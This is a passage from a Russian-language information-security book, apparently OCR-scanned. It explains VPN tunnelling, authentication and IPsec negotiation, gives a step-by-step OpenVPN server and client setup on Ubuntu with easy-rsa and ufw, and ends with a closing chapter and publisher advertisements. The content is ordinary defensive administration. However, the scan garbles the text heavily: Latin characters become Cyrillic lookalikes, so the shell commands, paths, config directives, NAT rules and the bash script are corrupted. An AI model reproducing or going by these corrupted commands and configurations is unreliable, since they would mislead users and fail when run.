гочисленным ресурсам, находящимся за ним, во внутренней сети. Обычно это 
отдельные устройства, занимающиеся аутентификацией пользователей и марш¬ 
рутизацией. Также посредством двух ѴРХ'-пі.ткізон обеспечивается надежное взаи¬ 
модействие пользователей и ресурсов, находящихся в различных удаленных сетях. 

Грамотная конфигурация таких шлюзов имеет критическое значение для обеспече¬ 
ния должного уровня И Б. В сети обязательно должен присутствовать барьер между 
конечной точкой туннеля и внутренней сетью. Обычно им выступает брандмауэр. 
Во многих компаниях брандмауэр сочетает в себе функции фаервола и ѴР1Ч- шлюза. 
Логично расположить такой шлюз в [ )М/-сети, которая уже отделена от внутренней, 
ведь очень важно, чтобы потоки данных внутренней сети и V Рі\' были разделены. 

Еще одна проблема, о которой стоит задуматься при организации соединения типа 
«сеть-сеть», это то, где именно будут дешифрованы данные на противоположном 
конце. Сейчас поясним подробнее. Когда дело касается одного предприятия и вто¬ 
рой конец туннеля также администрируется сотрудниками вашей компании, то вы 
сами выбираете наиболее безопасную архитектуру для построения сети удаленного 
офиса. Однако ситуация меняется в случае, когда вы выстраиваете соединение 
с сетью вашего бизнес-партнера. В этом случае вы никак не можете влиять на без¬ 
опасность и архитектуру удаленной сети, однако бизнес-модель подразумевает, что 
вы будете передавать конфиденциальные данные своей компании в другой офис, 
удаленный и, возможно, небезопасный. Есть над чем задуматься, не правда ли? 
Некоторые компании перед включением в свою сеть бизнес-партнеров проводят 
аудит безопасности их сети, а также подписывают двустороннее соглашение, обя¬ 
зывающее стороны следить за безопасностью данных. На наш взгляд, это хорошее, 
хоть и трудозатратное решение. 

В качестве среды передачи данных может выступать любая линия связи. Это могут 
быть телефонные линии, оптоволоконные каналы, смешанные среды и даже те, 
в которых используются другие протоколы передачи данных, нежели чем в сети 
предприятия. 

Последнее достигается благодаря туннелированию. Суть данной технологии со¬ 
стоит в том, что предназначенные для удаленной сети пакеты данных помещаются 
внутрь других пакетов, которые будут передаваться через Интернет. Пакеты про¬ 
токолов более низкого уровня можно инкапсулировать в пакеты более высокого 
уровня согласно модели 081. Также можно инкапсулировать друг в друга и пакеты 
одного уровня. 
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Рис. 23.1. Организация ѴРИ 

Один пакет данных помещается в другой полностью, вместе с полем данных и все¬ 
ми заголовками. Один из недостатков такого подхода состоит в том, что для пере¬ 
дачи того же количества данных приходится использовать большее количество 
пакетов, что увеличивает нагрузку на сеть. Однако современное оборудование 
и высокоскоростные среды передачи информации нивелируют этот недостаток. 

Однако инкапсуляция не гарантирует сохранность данных. Для обеспечения долж¬ 
ного уровня безопасности информации перед инкапсуляцией пакеты полностью 
шифруются, и вместе с полем данных злоумышленникам становится недоступна 
и служебная информация, такая как адреса отправителя и получателя пакетов. Это 
позволяет предотвратить утечку информации о структуре внутренней сети. 

Итак, подытожим написанное выше. После установки соединения между клиентом 
и сервером предназначенные для передачи по открытой сети конфиденциальные 
данные шифруются вместе со служебными заголовками и помещаются в поле 
данных незашифрованного пакета. Служебные заголовки такого пакета могут быть 
прочитаны любым устройством глобальной сети. Благодаря этому пакет достигает 
своей цели — ѴРЫ-шлюза. На шлюзе из поля данных незашифрованного пакета 
извлекаются зашифрованные данные. Затем они дешифруются и передаются по 
внутренней сети точно так же, как и пакет с данными от любого другого пакета 
этой сети. 

Данную технологию можно представить в виде почтового голубя. К птице прикре¬ 
пляется послание, которое она доставляет в нужный пункт назначения. При этом 
ей все равно, на каком языке написано письмо, зашифровано оно или нет, а также 
будет оно потом пересылаться дальше или останется в той точке, куда она его до¬ 
ставит. Главное для нее — донести послание из точки А в точку Б, и на этом всё. 
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Безопасность ѴРЫ 

Итак, мы разобрались с основными физическими компонентами УРИ-методов 
передачи информации в открытых сетях. Настало время рассказать о самом инте¬ 
ресном — о том, как обеспечивается безопасность таких сетей. 

Во всех виртуальных частных сетях должно обеспечиваться соблюдение трех ос¬ 
новных критериев: 

□ Доступность. V Рі\' — это прежде всего еще один сервис, обеспечивающий до¬ 
ступ сотрудников и бизнес-партнеров организации к внутренним ресурсам. 
А это значит, что ИТ-специалисты должны поддерживать необходимый уровень 
сервиса, и эта услуга должна быть доступна всем легитимным пользователям. 

□ Проверка целостности. Мы не можем гарантировать того, что передаваемые по 
открытой сети данные не будут перехвачены и изменены. В конце концов, в не¬ 
которых средах передачи данных определенное количество испорченных паке¬ 
тов является нормой. Однако мы должны иметь возможность фильтровать такие 
пакеты. Обычно такая фильтрация становится возможной благодаря цифровым 
подписям, которые основываются на асимметричных методах шифрования. 

□ Обеспечение конфиденциальности. Необходимо сделать так, чтобы содержи¬ 
мое передаваемой информации было известно только отправителю и получа¬ 
телю. Этого можно достичь благодаря различным алгоритмам симметричного 
и несимметричного шифрования. 

Однако это еще не все. Нам необходимо отличать легитимных пользователей, име¬ 
ющих право получать доступ к сети, от злоумышленников. Этого можно достичь 
с помощью аутентификации. Аутентификация может осуществляться при помощи 
логина и пароля, цифрового сертификата, смарт-карты, генератора одноразовых 
паролей и многого другого. 

После того как система аутентифицировала клиента, начинается следующий 
этап — авторизация. На этом этапе система должна проверить, какие именно ре¬ 
сурсы должны быть доступны аутентифицированному клиенту, и предоставить 
к ним доступ. 

Авторизация и аутентификация может происходить двумя путями — централизо¬ 
ванным и децентрализованным. При втором подходе вся информация о клиенте 
хранится в базе данных сервера и не связана с другими ИС. Обычно это затрудняет 
администрирование. Представьте себе, что вы администратор крупной сети и ваши 
сотрудники имеют доступ к десяткам ИС. В случае децентрализованного управ¬ 
ления вам придется создавать учетную запись пользователя и настраивать права 
доступа отдельно для каждой системы, что, в свою очередь, приведет к ошибкам 
при администрировании, а это может повлечь за собой возникновение инциден¬ 
тов, связанных с И Б. При таком подходе достаточно просто забыть заблокировать 
учетную запись скомпрометированного пользователя в одной из множества ИС 
и тем самым допустить возможность кражи злоумышленником конфиденциальной 
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информации. Централизованная же система лишена этого недостатка, учетные 
записи пользователей создаются и управляются из одного и того же места. 

Основная задача централизованной системы — реализовать возможность единого 
входа и централизованного управления. Осуществить реализацию данного прин¬ 
ципа могут помочь такие системы, как КА Г) I Іі 5 и ТАСАС5. 

Еще удобнее внедрить групповую модель управления доступом. В этом случае вы 
будете просто добавлять пользователей в определенные группы, а уже группам 
давать права доступа. При таком подходе у вас могут быть тысячи пользователей 
и только несколько десятков групп. Согласитесь, это достаточно удобно. 

Теперь настала пора рассмотреть процесс установки безопасного соединения. Во¬ 
обще существуют различные технологии приватных сетей, и ниже мы приведем их 
краткую классификацию, но процесс установки соединения будем рассматривать 
на примере ІРЗес, так как на сегодняшний день это самый широко используемый 
протокол. 

ѴРЦ канального уровня прозрачны для приложений, могут инкапсулировать па¬ 
кеты третьего уровня и выше. Используют такие протоколы, как Г2 Г, РРТР, Г2ТР. 

ѴРЦ сетевого уровня также не вызывают проблем в работе приложений, инкап¬ 
сулируют ІР в ІР. Самый известный и наиболее распространенный протокол, 
работающий на данном уровне, — ІРЗес. Он обеспечивает аутентификацию, тун¬ 
нелирование и шифрование пакетов. Является обязательным компонентом ІРѵб. 

ѴРЦ сеансового уровня предназначены для ретрансляции трафика из защищен¬ 
ной сети в общедоступную. Работают посредством сокетов, а защита информации 
осуществляется благодаря ТЕЗ. 

Итак, вернемся к процедуре установления безопасного соединения. Вне зависи¬ 
мости от того, какое ПО вы будете использовать, все будет происходить согласно 
описанным далее принципам. 

Обе стороны должны иметь одинаковую конфигурацию. Это значит, что они скон¬ 
фигурированы для использования одних и тех же протоколов шифрования данных 
и технологий обеспечения целостности информации. 

Прежде чем отправлять информацию по сети, оба хоста должны идентифицировать 
себя, чтобы убедиться в том, что отправка произойдет в нужном направлении. 

После того как соединение будет установлено, оба хоста должны принять реше¬ 
ние об используемых алгоритмах шифрования. Один шлюз может поддерживать 
несколько разных алгоритмов для обеспечения взаимодействия с разными кли¬ 
ентами. 

После того как решение об используемых алгоритмах принято, создается ключ, 
который затем будет использован для шифрации и дешифрации данных. 

В ІРЗес установка соединения происходит в две фазы. Во время первой фазы хосты 
договариваются о методе идентификации, алгоритме шифрования и протоколе 
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Диффи—Хеллмана (БШіе—Неіітап). Данные во время этой фазы передаются 
в незашифрованном виде. В случае, если первая фаза прошла успешно и хостам 
удалось договориться между собой, создается ассоциация между этими узлами. Эти 
ассоциации безопасности (Зесштіу Аззосіаііоп) создаются и хранятся на каждом 
узле в течение всей сессии. Они обеспечивают однонаправленную передачу данных 
и описывают используемые для данного соединения алгоритмы. Поскольку каждый 
шлюз может создавать множество защищенных соединений, каждой ассоциации 
присваивается уникальный номер, по которому можно определить, к какому узлу 
относится данная ассоциация. Как правило, такие ассоциации содержат инфор¬ 
мацию об алгоритмах шифрования, методах определения целостности данных, 
способе идентификации узла, протоколе Диффи—Хеллмана, времени жизни ключа 
шифрования данных и т. д. 

Во время второй фазы данные передаются уже в зашифрованном виде. В течение 
этой фазы генерируются ключи, а хосты договариваются об используемой поли¬ 
тике. В случае удачного завершения данной фазы на хостах создаются ассоциации 
безопасности ІРЗес. 

Создание ѴРЫ из компонентов с открытым 
исходным кодом 

Итак, после освоения теоретической части перейдем к практике. Мы расскажем 
вам об основных этапах создания ѴРЦ-сервера с использованием компонентов 
с открытым исходным кодом. Надо сказать, что и сам сервер также является бес¬ 
платным и доступным, для примера мы выбрали ЦЬипІи 16.04. 

Мы не будем детально описывать инсталляцию и конфигурацию каждого компо¬ 
нента. Цель данного раздела — показать основные этапы и принципы построения 
сервера для лучшего понимания технологии ѴР1Х 

Итак, начнем. После установки ОС необходимо проинсталлировать ОрепѴРЦ. 
Данное ПО использует библиотеку ОрепЗЗЬ и позволяет создавать зашифрован¬ 
ные каналы. 

Так как мы будем создавать ѴРЦ на основании ТР5/38Р, нам необходимо сгене¬ 
рировать и подписать сертификаты безопасности или, говоря другими словами, 
развернуть центр сертификации. Для выпуска сертификатов можно использовать 
еазу-гза, это ПО входит в стандартные репозитории Шшпіи. 

После инсталляции создайте директорию для центра сертификации с помощью 
команды шаке-сасііг ~/орепѵрп-са. Это пригодится вам в будущем и облегчит ад¬ 
министрирование. На следующем шаге необходимо отредактировать переменные, 
которые будут использоваться нашим центром сертификации. Все они хранятся 
в файле с именем ѵагз и находятся в папке орепѵрп-са. Активируйте новую конфи¬ 
гурацию командой зоигсе ѵагз, после этого очистим нашу среду командой ./сіеап-аіі 
и создадим центр сертификации — ,/ЬиіЫ-са. 
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Теперь, когда у нас есть свой центр сертификации, мы можем создать пару ключей 
для шифрования данных со стороны сервера — ./Ъиііб-кеу-зегѵег зегѵег. В вашем 
случае параметр зегѵег необходимо будет заменить на тот, который вы задали на 
предыдущем шаге в поле ехрогі К І:Ѵ_\'АМ Г. 

Помимо этого нам необходимо сгенерировать ключи для протокола Диффи— 
Хеллмана: ./ЪиіІб-бЪ. Создадим также подпись НМАС для проверки целостности 
ТЬ5 — орепѵрп -§епкеу —зссгсС кеузДа.кеу. 

Проблему с ключами для сервера мы решили, теперь пришло время создать 
ключи для клиента. Обратите внимание на то, что ключи необходимо создавать 
для каждого клиента отдельно. На самом деле безопаснее, когда клиент создает 
ключи сам, а вам отдает только сертификат для подписи. Но в нашем примере 
мы сгенерируем все у себя на сервере. Перейдем в директорию центра сертифи¬ 
кации сб -/орепѵрп-са, активируем конфигурацию зоигсе ѵагз и создадим ключи 
./Ъиііб-кеу сіісгді . 

Далее необходимо настроить сервис Ореп ѴРХ. Прежде всего скопируем созданные 
ранее ключи ср са.сгГ са.кеу зсгѵсг.сгГ зегѵег.кеу Га.кеу б1і2048.реш /еГс/орепѵрп. За¬ 
тем скопируем и отредактируем конфигурационный файл данного сервиса §ипгір 
-с /и8г/зЬаге/бос/орепѵрп/ехатр1е5/8атр1е-сопй§-іі1ез/зегѵег.сопі'.§2 | зибо Гее / 
еГс / орепѵрп / зегѵег.сопі'. 

Задав тип аутентификации, параметры шифрования и рабочие группы, обратите 
внимание на то, чтобы следующие параметры присутствовали и не были заком¬ 
ментированы: 

□ Нз-аиГЬ Га.кеу 0; 

□ кеу-бігесГіоп 0; 

□ сірііег АЕ5-128-СВС; 

□ аиГЬ 5НА256; 

□ изегпоЬобу; 

□ §гоир по^гоир. 

Теперь необходимо настроить сам сервер таким образом, чтобы он мог корректно 
перенаправлять сетевой трафик. Отредактируем файл /сгс/зузсі і.солі так, чтобы 
параметр пеГ.ірѵ4.ір_іог\ѵагб не был закомментирован и имел значение 1. 

Но этого будет недостаточно. Для обеспечения трансляции адресов необходимо 
настроить фаерфол, в нашем случае выбор пал на иігѵ. 

Файл /еГс/иВѵ/Ъеіоге.гиІез будет выглядеть следующим образом: 

# 5ГАКГ ОРЕМѴРМ КІЛ_Е5 

# МАГ ТаЫе ги1е5 
*па1; 
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: Р05ТК01ІТІМС АССЕРТ [0:0] 

# АІІом ТгаТТіс Тгот ОрепѴР№ сНепТ То еТ(і0 

-А Р05ТК01ЯІШ -5 10.8.0.0/8 -О еТІ10 -] МАЗСЮЕКАОЕ 
СОММІТ 

# ЕШ 0РЕІМѴРМ КІІІ.Е5 

Теперь разрешим нашему фаерволу принимать перенаправленные пакеты. Для это¬ 
го откроем файл /еІс/сІеФиК/иКу и в директиве Б ЕІ А I! ЬТ_Р О К ѴѴА КБ_ I' О Ы С У 
заменим Б КОР на АССЕРТ. 

Последним шагом будет открытие необходимых портов и применение политик. 
Это можно сделать, выполнив следующие четыре команды: 

□ ийѵ а11о\ѵ 1194/ибр; 

□ и Іѵѵ а11о\ѵ Ореп55Н; 

□ ийѵсйзаЫе; 

□ ийѵ епаЫе. 

На этом всё, сервер сконфигурирован. Теперь просто запустите сервис командой 
зузіетсіі зіагі орепѵрп@зегѵег. 

Сейчас пора задуматься о том, каким образом мы будем создавать файлы конфи¬ 
гурации для наших клиентов. Создадим для них отдельную директорию ткДіг -р 
-/сІіепСсопй^з/йІез и зададим необходимые права доступа сЬтой 700 -/сііепі;- 
сопй§з/й1ез. 

Далее, как и в случае с сервером, скопируем шаблон конфигурации в нашу дирек¬ 
торию и отредактируем его — ср /изг/зйаге/сіос/орепѵрп/ехатріез/затріе-сопіф»- 
Шез/сИепСсопГ -/сІіепСсопй^з/Ъазе.сопй 

В этом файле необходимо задать следующие параметры: 

□ ІР_адрес_ѴР1чІ_сервера 1194; 

□ рпЛо ийр; 

□ §гоир по§гоир; 

□ изег поЬойу; 

□ #са са.оі; 

□ #сег1; сНепСсгС 

□ #кеу сйепСкеу; 

□ сірЬег АЕ5-128-СВС; 

□ аиіЬ 8НА256; 

□ кеу-сйгесНоп 1. 
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Для облегчения последующей генерации файлов конфигурации, которые будут 
содержать в том числе и ключи для шифрования, мы рекомендуем использовать 
следующий скрипт: 

#!/Ьіп/Ьа5И 

# РігзТ аг§итеп1:: СИепТ ісІепГі-Ріег 

КЕѴ_0ІК=~/орепѵрп-са/кеу5 
01ІТРІІТ_ВІК=~/с1іеп-1;-соп-Рі§5/-Рі1е5 
ВА5Е_С0МРІС=~/с1іеп1:-соп-Рі§5/Ьа5е. согѵР 

саТ ${ВА5Е_Ш\ІРіе} \ 

<(есГіо -е '<са>') \ 

${КЕУ_ОІК}/са.сгЧ: \ 

<(есРю -е ' </са>\п<сегТ>') \ 

${КЕУ_ВІК}/${1}.сгТ \ 

< (есГіо -е ' </сегТ>\п<кеу>') \ 

${КЕУ_0ІК}/${1}.кеу \ 

<(есРю -е ' </кеу>\п<Т:І5-аиТ:Рі> ') \ 

${КЕУ_0ІК}/-1;а.кеу \ 

<(есГіо -е ' </ТІ5-аи1;Рі>') \ 

> ${оитрит_оік}/${і}.оѵрп 

Предположим, что мы назвали наш скрипт шаке_сопіі§.§Ь. Теперь, используя соз¬ 
данный на прошлом шаге сертификат, создадим конфигурацию для клиента одной 
командой ./шаке_сопй§.8Ь сіістщі и на выходе получим файл с именем сІіепГІ.оѵрп. 

Теперь разберемся с клиентской частью. Орел ѴРХ существует для Ілніх, Апсігоісі 
и \Ѵіпс1о\ѵ5. Для создания безопасного соединения в ОС \Ѵтс1о\ѵ8 необходимо 
установить клиентское ПО, скопировать конфигурационный файл на устройство 
пользователя в директорию ОрепѴРК и запустить приложение с правами адми¬ 
нистратора. Далее в самой программе кликните на кнопку соединения, и процесс 
будет запущен. 



Заключение 


Уважаемый читатель! Несмотря на то что в этой книге приведены лишь основные 
и самые распространенные методы, применяемые специалистами в области ИБ, не 
расстраивайтесь, если вам не удастся воспроизвести их с первого раза. 

Когда автор данной книги делал свои первые шаги в мире ИТ, он переустанавливал 
всю ОС только из-за того, что во время инсталляции забывал установить какой- 
либо компонент. Пробуйте, исследуйте, читайте и делитесь опытом — только так 
вы сможете достичь настоящих вершин мастерства. 

«Теория без практики мертва и бесплодна, а практика без теории бесполезна и па¬ 
губна», — сказал генералиссимус российских сухопутных и морских сил Александр 
Суворов. На наш взгляд, он был прав! Не пытайтесь просто повторить приведенные 
примеры - осмыслите их, задавайте себе вопросы и ищите на них ответы. Не бой¬ 
тесь слишком углубиться в какую-то одну область: в конце концов, среди специали¬ 
стов по И Б так же существуют узкие специалисты. Все знать невозможно, изучайте 
то, что вам нравится, будь то анализ веб-приложений, социальная инженерия или 
поиск уязвимостей в ПО. 

Не забывайте о создании лаборатории, пусть даже виртуальной. Она будет хо¬ 
рошим подспорьем в оттачивании практических навыков перед их применением 
в реальном мире. 

Создавайте профессиональные сообщества или принимайте активное участие 
в работе существующих. Именно от коллег по цеху можно узнать самую актуаль¬ 
ную информацию. Иногда после беседы с другим специалистом приходят самые 
неожиданные решения проблемы, над которыми вы бились последнюю неделю, 
месяц или даже год. Не бойтесь признаться себе и другим в том, что вы чего-то не 
знаете, — это нормально. 

Помогайте и обучайте других. Иногда ваши ученики могут вам задавать вопросы 
ответов на которые у вас не будет, — воспринимайте это как возможность разви¬ 
ваться. Да, в ходе преподавания вам придется объяснять очевидные вещи тысячу 
раз, зато это поможет вам самим не забыть их и не допустить постыдную для вы¬ 
сококлассного профессионала ошибку новичка. 
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Не забывайте золотое правило ИБ: «никто и никогда не находится в безопасности». 
Не существует систем, которые нельзя взломать, существуют лишь люди, у кото¬ 
рых недостаточно для этого опыта, знаний, смекалки или всего этого сразу. В мире 
ИТ существуют тысячи примеров взлома НС в ситуациях, когда администраторы 
не уделяли должного внимания безопасности, понадеявшись на бренд с громким 
именем и разработчиков продукта. 

Мы надеемся, что всю полученную в этой книге информацию вы будете исполь¬ 
зовать исключительно в рамках правового поля или, как минимум, во благо всего 
человечества. 

Удачи! 
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• на нашем сайте: ѵѵѵѵѵѵ.рііег.сот 

• по электронной почте: Ьоок5@ріІег.сот 

• по телефону: (812) 703-73-74 

ВЫ МОЖЕТЕ ВЫБРАТЬ ЛЮБОЙ УДОБНЫЙ ДЛЯ ВАС СПОСОБ ОПЛАТЫ: 

Наложенным платежом соплатой при получении в ближайшем 
почтовом отделении. 

С помощью банковской карты. Во время заказа вы будете 
перенаправлены на защищенный сервер нашего оператора, где сможете 
ввести свои данные для оплаты. 

Электронными деньгами. Мы принимаем к оплате Яндекс.Деньги, 
ѴѴеЬтопеу и Кіѵѵі-кошелек. 

В любом банке, распечатав квитанцию, которая формируется 
автоматически после совершения вами заказа. 

ВЫ МОЖЕТЕ ВЫБРАТЬ ЛЮБОЙ УДОБНЫЙ ДЛЯ ВАС СПОСОБ ДОСТАВКИ: 

• Посылки отправляются через «Почту России». Отработанная 
система позволяет нам организовывать доставку ваших покупок 
максимально быстро. Дату отправления вашей покупки и дату 
доставки вам сообщат по е-таіі. 

• Вы можете оформить курьерскую доставку своего заказа (более 
подробную информацию можно получить на нашем сайте ѵѵѵѵѵѵ.рііег.сопл). 

• Можно оформить доставку заказа через почтоматы (адреса почтоматов 
можно узнать на нашем сайте ѵѵѵѵѵѵ.рііег.сот). 

ПРИ ОФОРМЛЕНИИ ЗАКАЗА УКАЖИТЕ: 

• фамилию, имя, отчество, телефон, е-таіі; 

• почтовый индекс, регион, район, населенный пункт, улицу, дом, 
корпус, квартиру; 

• название книги, автора, количество заказываемых экземпляров. 


% 

% 

% 

% 


БЕСПЛАТНАЯ ДОСТАВКА: • курьером по Москве и Санкт-Петербургу 

при заказе на сумму от 2000 руб. 

• почтой России при предварительной оплате 
заказа на сумму от 2000 руб. 
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ВАША УНИКАЛЬНАЯ КНИГА 

Хотите издать свою книгу? Она станет идеальным подарком для партнеров 
и друзей, отличным инструментом для продвижения вашего бренда, презентом 
для памятных событий! Мы сможем осуществить ваши любые, даже самые 
смелые и сложные, идеи и проекты. 

МЫ ПРЕДЛАГАЕМ: 

• издать вашу книгу 

• издание книги для использования в маркетинговых активностях 

• книги как корпоративные подарки 

• рекламу в книгах 

• издание корпоративной библиотеки 

Почему надо выбрать именно нас: 

Издательству «Питер» более 20 лет. Наш опыт - гарантия высокого качества. 

Мы предлагаем: 

• услуги по обработке и доработке вашего текста 

• современный дизайн от профессионалов 

• высокий уровень полиграфического исполнения 

• продажу вашей книги во всех книжных магазинах страны 

Обеспечим продвижение вашей книги: 

• рекламой в профильных СМИ и местах продаж 

• рецензиями в ведущих книжных изданиях 

• интернет-поддержкой рекламной кампании 

Мы имеем собственную сеть дистрибуции по всей России, а также на Украине 
и в Беларуси. Сотрудничаем с крупнейшими книжными магазинами. 
Издательство «Питер» является постоянным участником многих конференций 
и семинаров, которые предоставляют широкую возможность реализации книг. 

Мы обязательно проследим, чтобы ваша книга постоянно имелась в наличии 
в магазинах и была выложена на самых видных местах. 

Обеспечим индивидуальный подход к каждому клиенту, эксклюзивный дизайн, 
любой тираж. 

Кроме того, предлагаем вам выпустить электронную книгу. Мы разместим 
ее в крупнейших интернет-магазинах. Книга будет сверстана в формате еРиЬ 
или РОГ - самых популярных и надежных форматах на сегодняшний день. 

Свяжитесь с нами прямо сейчас: 

Санкт-Петербург - Анна Титова, (812) 703-73-73, іііоѵа@ріІег.сот 
Москва - Сергей Клебанов, (495) 234-38-15, кІеЬапоѵ@рііег.сот 


